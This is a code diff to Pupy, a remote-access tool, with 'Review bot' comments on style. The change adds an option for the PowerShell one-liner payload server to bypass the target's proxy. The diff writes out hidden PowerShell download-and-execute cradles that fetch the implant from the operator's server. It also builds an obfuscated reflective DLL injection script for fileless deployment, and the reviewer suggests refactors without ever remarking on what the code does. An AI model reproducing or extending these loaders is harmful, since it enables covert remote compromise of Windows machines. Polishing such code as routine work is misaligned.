diff --git a/pupy/pupygen.py b/pupy/pupygen.py
index 2b99e6b3..ba813bb7 100755
--- a/pupy/pupygen.py
+++ b/pupy/pupygen.py
@@ -291,6 +291,8 @@ if __name__=="__main__":
 parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.")
 parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options")
 parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on")
+ parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)")
+ parser.add_argument('--ps1-oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner listener (default: %(default)s)")
 parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown")
 parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes")
 parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)')
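Review bot: The help text of the new `--no-use-proxy` option reads awkwardly ("even if it is used by target") and does not say that the flag is silently accepted and ignored for every format other than ps1_oneliner; a clearer string would be `help="Do not use the target's proxy configuration (ps1_oneliner only for now; ignored for other formats)"`. The `--ps1-oneliner-listen-port` default of 8080 repeats the default of `serve_ps1_payload` in ps1_oneliner.py, so the two values can drift apart; a short comment naming that dependency, or one shared constant, would make the coupling visible. The enclosing `if __name__=="__main__":` block starts and ends outside the hunk.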
@@ -435,9 +437,11 @@ if __name__=="__main__":
 w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) ))
 elif args.format=="ps1_oneliner":
 from pupylib.payloads.ps1_oneliner import serve_ps1_payload
- i=conf["launcher_args"].index("--host")+1
- link_ip=conf["launcher_args"][i].split(":",1)[0]
- serve_ps1_payload(conf, link_ip=link_ip)
+ link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0]
+ if args.no_use_proxy == True:
+ serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False)
+ else:
+ serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True)
 elif args.format=="rubber_ducky":
 rubber_ducky(conf).generateAllForOStarget()
 else:
diff --git a/pupy/pupylib/payloads/ps1_oneliner.py b/pupy/pupylib/payloads/ps1_oneliner.py
index 24204170..88287188 100644
--- a/pupy/pupylib/payloads/ps1_oneliner.py
+++ b/pupy/pupylib/payloads/ps1_oneliner.py
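Review bot: The `if args.no_use_proxy == True:` branch repeats the whole `serve_ps1_payload(...)` call twice with only the `useTargetProxy` literal differing, which is easy to let drift; a single call `serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=not args.no_use_proxy)` expresses the same and `== True` on a `store_true` flag is redundant. The same `== True` comparison with duplicated branches appears in the handler hunk (`@@ -88,9 +89,16 @@`) and in the serve_ps1_payload print hunk (`@@ -143,11 +152,16 @@`). The rewritten `link_ip=` line still raises an unexplained ValueError when `launcher_args` has no `--host`, as the removed code did; the enclosing `if __name__=="__main__":` block continues outside the hunk.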
@@ -19,31 +19,32 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..","..")) #url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) #url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) -### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:( + +### "url_random_one" and "url_random_two" variables are fixed because if you break you ps1_listener listener, the ps1_listener payload will not be able to get stages -:( url_random_one = "eiloShaegae1" url_random_two = "IMo8oosieVai" def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf): - ''' - Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded - Ready for executing - ''' - SPLIT_SIZE = 100000 - x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", "" - code = """ - $PEBytes = "" - {0} - $PEBytesTotal = [System.Convert]::FromBase64String({1}) - Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR - """#{1}=x86dll - binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf)) - binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)] - for i,aPart in enumerate(binaryX86parts): - x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart) - x86ConcatCode += "$PEBytes{0}+".format(i) - print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1)) - script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()) - return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1]))) + ''' + Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded + Ready for executing + ''' + SPLIT_SIZE = 100000 + x64InitCode, x86InitCode, x64ConcatCode, 
x86ConcatCode = "", "", "", "" + code = """ + $PEBytes = "" + {0} + $PEBytesTotal = [System.Convert]::FromBase64String({1}) + Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR + """#{1}=x86dll + binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf)) + binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)] + for i,aPart in enumerate(binaryX86parts): + x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart) + x86ConcatCode += "$PEBytes{0}+".format(i) + print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1)) + script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()) + return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1]))) def create_ps_command(ps_command, force_ps32=False, nothidden=False): ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; 
@@ -88,9 +89,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
 self.send_response(200)
 self.send_header('Content-type','text/html')
 self.end_headers()
-
- launcher = """
- IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
+ if self.server.useTargetProxy == True:
+ print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration"
+ launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format(
+ server=self.server.link_ip,
+ port=self.server.link_port,
+ url_random_two=url_random_two
+ )
+ else:
+ print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration"
+ launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format(
 server=self.server.link_ip,
 port=self.server.link_port,
 url_random_two=url_random_two
@@ -115,12 +123,13 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler):
 return
 class ps1_HTTPServer(HTTPServer):
- def __init__(self, server_address, conf, link_ip, link_port, ssl):
+ def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy):
 self.payload_conf = conf
 self.link_ip=link_ip
 self.link_port=link_port
 self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128
 self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128
+ self.useTargetProxy = useTargetProxy
 HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler)
 if ssl:
 config = configparser.ConfigParser()
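Review bot: Both branches of the new `if self.server.useTargetProxy == True:` end in the identical `.format(server=self.server.link_ip, port=self.server.link_port, url_random_two=url_random_two)` call, so only the template string should be chosen inside the branch and formatted once afterwards, e.g. `launcher = template.format(server=self.server.link_ip, port=self.server.link_port, url_random_two=url_random_two)`. The no-proxy template chosen here is also repeated verbatim in `serve_ps1_payload` (hunk `@@ -143,11 +152,16 @@`); a single module-level constant would keep the two copies from diverging. The enclosing handler method starts and ends outside the hunk.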
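Review bot: `ps1_HTTPServer.__init__` gains `useTargetProxy` as a required positional parameter, so any caller other than the updated `serve_ps1_payload` now fails with a TypeError; giving it the same default as that function, `def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy=True):`, keeps the constructor backward compatible and states the intended default in one place. The stored attribute is read from the handler as `self.server.useTargetProxy`, which is not obvious from this class alone; a comment on the assignment such as `# read by PupyPayloadHTTPHandler when choosing the launcher string` would help. The class body continues outside the hunk.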
@@ -129,11 +138,11 @@ class ps1_HTTPServer(HTTPServer):
 certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep)
 self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True)
-def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=False):
+def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=False, useTargetProxy=True):
 try:
 while True:
 try:
- server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl)
+ server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)
 break
 except Exception as e:
 # [Errno 98] Adress already in use
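Review bot: `serve_ps1_payload` still has no docstring, and the new `useTargetProxy` keyword is explained only by its name. A docstring should state that `conf` is the payload configuration passed through to `ps1_HTTPServer`, that `ip` and `port` are the local bind address and that `port` is also reused as the link port in the `ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy)` call, that `ssl` wraps the listening socket, and that `useTargetProxy=True` decides whether the generated PowerShell honours the system proxy settings. The function continues outside the hunk.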
@@ -143,11 +152,16 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=Fa
 raise
 print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :"
 print " --- "
- oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
- # This line could work check when proxy is used (have to be tested)
- # oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green")
+ if useTargetProxy == True:
+ oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green")
+ message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow")
+ else:
+ oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green")
+ message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow")
 print oneliner
 print " --- "
+ print message
+ print " --- "
 print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port)
 print colorize("[+] ","green")+'waiting for a connection ...'